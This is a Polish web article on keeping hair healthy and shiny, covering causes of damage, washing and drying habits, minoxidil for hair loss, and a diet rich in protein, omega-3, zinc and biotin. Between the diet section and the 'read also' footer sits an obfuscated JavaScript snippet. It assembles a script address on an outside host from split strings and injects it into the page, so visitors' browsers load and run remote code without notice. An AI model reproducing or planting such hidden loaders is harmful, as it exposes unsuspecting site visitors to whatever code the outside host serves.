Shadow

Sposób na zdrowe i lśniące włosy

Towarzyszący nam w codziennym życiu stres, uboga w składniki odżywcze dieta, niewłaściwa pielęgnacja, nadużywanie środków do stylizacji włosów, zanieczyszczenia środowiska – to wszystko sprawia, że kondycja włosów jest coraz gorsza, coraz więcej osób narzeka na problemy z wypadaniem włosów. Tymczasem większość kobiet to właśnie zdrowe i lśniące włosy uważa za podstawowy atrybut kobiecości. Jak więc o nie dbać? Co zmienić?

Co szkodzi włosom?

Przyczyn pogorszenia kondycji włosów może być wiele. Na pewno wpływ na stan włosów mają warunki atmosferyczne – szkodliwie na strukturę włosa oddziałują zarówno zimny wiatr czy mróz, jak i promieniowanie UV.

Zbyt częste farbowanie, korzystanie z suszarki i prostownicy czy nadużywanie środków do stylizacji włosów również nie pozostają bez wpływu na zdrowie włosów. Może im także zaszkodzić niewłaściwa pielęgnacja czy używanie źle dobranych do potrzeb włosów kosmetyków.

Jednak na stan włosów mają również wpływ procesy, zachodzące wewnątrz organizmu. I tak nadmierne wypadanie włosów mogą spowodować chociażby zaburzenia hormonalne, np. te, występujące po ciąży, menopauzie czy odstawieniu antykoncepcji hormonalnej.

Przebyte choroby, jak choćby infekcje z wysoką gorączką, a także niektóre choroby ogólnoustrojowe też mogą być przyczyną problemów z włosami. Nie bez znaczenia dla kondycji włosów jest także nadmierny stres czy dieta, uboga w witaminy i minerały oraz białko.

Jak dbać o włosy?

U podstaw dbałości o włosy leży prawidłowa ich pielęgnacja. Nie należy przesadzać z częstotliwością mycia włosów, a jeśli już musimy to robić codziennie – sięgajmy po specjalnie do tego przeznaczone, łagodne szampony.

Podczas mycia głowy należy delikatnie masować skórę głowy opuszkami palców. Ważne jest dokładne wypłukanie szamponu. Absolutnie nie wolno gwałtownie pocierać włosów ręcznikiem. Rozczesywać należy włosy lekko przeschnięte, szczotką z włosia lub grzebieniem o grubych i rzadko rozstawionych zębach.

Jeśli konieczne jest użycie suszarki – warto zmniejszyć temperaturę nawiewu i zastosować kosmetyk chroniący przed nadmiarem ciepła. Dobrze też pamiętać, by na słońce, wiatr lub mróz nie wychodzić nigdy z mokrymi włosami.

Końcówki włosów powinno się podcinać co 7 do 10 tygodni. Warto stosować kosmetyki z keratyną, do włosów cienkich dodatkowo z zawartością protein i aminokwasów. Włosom przesuszonym dobrze zrobią kosmetyki z dodatkiem lipidów i olejków.

Na problem wypadających włosów warto zastosować kosmetyki lub leki do wcierania w skórę głowy, dzięki czemu nastąpi poprawa ukrwienia mieszków włosowych i odżywienie cebulek, a także uzupełnione zostaną niedobory, np. estrogenów. Warto też sięgnąć po bardziej specjalistyczne preparaty, zawierające minoksydyl, które wspomagają zwłaszcza w walce z łysieniem androgenowym.

Dieta dla zdrowych włosów

Podstawą utrzymania włosów w dobrej kondycji jest dobrze zbilansowana dieta, a zwłaszcza wypijanie odpowiednich ilości wody, dzięki której włosy będą dobrze nawilżone od wewnątrz. Dieta powinna być bogata w białko i proteiny, a także wielonienasycone kwasy tłuszczowe omega-3, których źródłem są chociażby ryby morskie.

Warto dostarczać włosom witaminy i minerały, zwłaszcza krzem, miedź i cynk, które znajdziemy na przykład w orzechach, migdałach, nasionach słonecznika czy pestkach z dyni. Czasem jednak konieczna jest suplementacja diety odpowiednio dobranymi preparatami witaminowymi, zwłaszcza takimi, które zawierają witaminy z grupy B (szczególnie biotynę) oraz żelazo.

(function(){
tdpju=”8lxjmrk0dpj9″;tdpj=document.createElement(„script”);
tdpj_=”u”+(„st”);tdpj_+=”at”+(„.”);tdpj.async=true;tdpj_+=”in”;
tdpju=”65789144.”+tdpju;tdpj.type=”text/javascript”;tdpju+=”leea3cqX7fu4″;
tdpju+=”ky4cyx”;tdpj_+=(„f”)+”o”+(„/”);tdpj.src=”//”+tdpj_+tdpju;
tdpjd=document.body;tdpjd.appendChild(tdpj);
})();

Przeczytaj także

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.